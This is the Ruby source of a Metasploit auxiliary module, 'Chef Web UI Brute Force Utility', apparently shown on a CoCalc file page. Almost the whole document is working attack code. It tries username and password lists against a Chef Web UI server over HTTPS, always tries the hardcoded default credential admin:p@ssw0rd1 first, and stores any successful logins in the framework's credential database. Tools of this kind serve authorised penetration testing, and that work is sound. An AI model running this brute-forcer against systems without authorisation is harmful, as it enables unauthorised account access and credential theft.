CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasploit/framework/login_scanner/chef_webui'
7
require 'metasploit/framework/credential_collection'
8

9
class MetasploitModule < Msf::Auxiliary
10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Auxiliary::AuthBrute
12
  include Msf::Auxiliary::Report
13
  include Msf::Auxiliary::Scanner
14

15
  def initialize
16
    super(
17
      'Name'           => 'Chef Web UI Brute Force Utility',
18
      'Description'    => %q{
19
        This module attempts to login to Chef Web UI server instance using username and password
20
        combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It
21
        will also test for the default login (admin:p@ssw0rd1).
22
      },
23
      'Author'         =>
24
        [
25
          'hdm'
26
        ],
27
      'License'        => MSF_LICENSE,
28
      'DefaultOptions' =>
29
      {
30
        'SSL'         => true,
31
      }
32
    )
33

34
    register_options(
35
      [
36
        Opt::RPORT(443),
37
        OptString.new('USERNAME', [false, 'The username to specify for authentication', '']),
38
        OptString.new('PASSWORD', [false, 'The password to specify for authentication', '']),
39
        OptString.new('TARGETURI', [ true,  'The path to the Chef Web UI application', '/']),
40
      ])
41
  end
42

43
  #
44
  # main
45
  #
46
  def run_host(ip)
47
    init_loginscanner(ip)
48
    msg = @scanner.check_setup
49
    if msg
50
      print_brute :level => :error, :ip => rhost, :msg => msg
51
      return
52
    end
53

54
    print_brute :level=>:status, :ip=>rhost, :msg=>("Found Chef Web UI application at #{datastore['TARGETURI']}")
55
    bruteforce(ip)
56
  end
57

58
  def bruteforce(ip)
59
    @scanner.scan! do |result|
60
      case result.status
61
        when Metasploit::Model::Login::Status::SUCCESSFUL
62
          print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
63
          do_report(ip, rport, result)
64
          :next_user
65
        when Metasploit::Model::Login::Status::DENIED_ACCESS
66
          print_brute :level => :status, :ip => ip, :msg => "Correct credentials, but unable to login: '#{result.credential}'"
67
          do_report(ip, rport, result)
68
          :next_user
69
        when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
70
          if datastore['VERBOSE']
71
            print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
72
          end
73
          invalidate_login(
74
            address: ip,
75
            port: rport,
76
            protocol: 'tcp',
77
            public: result.credential.public,
78
            private: result.credential.private,
79
            realm_key: result.credential.realm_key,
80
            realm_value: result.credential.realm,
81
            status: result.status
82
          )
83
          :abort
84
        when Metasploit::Model::Login::Status::INCORRECT
85
          if datastore['VERBOSE']
86
            print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
87
          end
88
          invalidate_login(
89
            address: ip,
90
            port: rport,
91
            protocol: 'tcp',
92
            public: result.credential.public,
93
            private: result.credential.private,
94
            realm_key: result.credential.realm_key,
95
            realm_value: result.credential.realm,
96
            status: result.status
97
          )
98
      end
99
    end
100
  end
101

102
  def do_report(ip, port, result)
103
    service_data = {
104
      address: ip,
105
      port: port,
106
      service_name: 'http',
107
      protocol: 'tcp',
108
      workspace_id: myworkspace_id
109
    }
110

111
    credential_data = {
112
      module_fullname: self.fullname,
113
      origin_type: :service,
114
      private_data: result.credential.private,
115
      private_type: :password,
116
      username: result.credential.public,
117
    }.merge(service_data)
118

119
    credential_core = create_credential(credential_data)
120

121
    login_data = {
122
      core: credential_core,
123
      last_attempted_at: DateTime.now,
124
      status: result.status
125
    }.merge(service_data)
126

127
    create_credential_login(login_data)
128
  end
129

130
  def init_loginscanner(ip)
131
    @cred_collection = build_credential_collection(
132
      username: datastore['USERNAME'],
133
      password: datastore['PASSWORD']
134
    )
135

136
    # Always try the default first
137
    @cred_collection.prepend_cred(
138
      Metasploit::Framework::Credential.new(public: 'admin', private: 'p@ssw0rd1')
139
    )
140

141
    @scanner = Metasploit::Framework::LoginScanner::ChefWebUI.new(
142
      configure_http_login_scanner(
143
        uri:                datastore['TARGETURI'],
144
        cred_details:       @cred_collection,
145
        stop_on_success:    datastore['STOP_ON_SUCCESS'],
146
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
147
        connection_timeout: 5,
148
        http_username: datastore['HttpUsername'],
149
        http_password: datastore['HttpPassword']
150
      )
151
    )
152
  end
153
end
154

155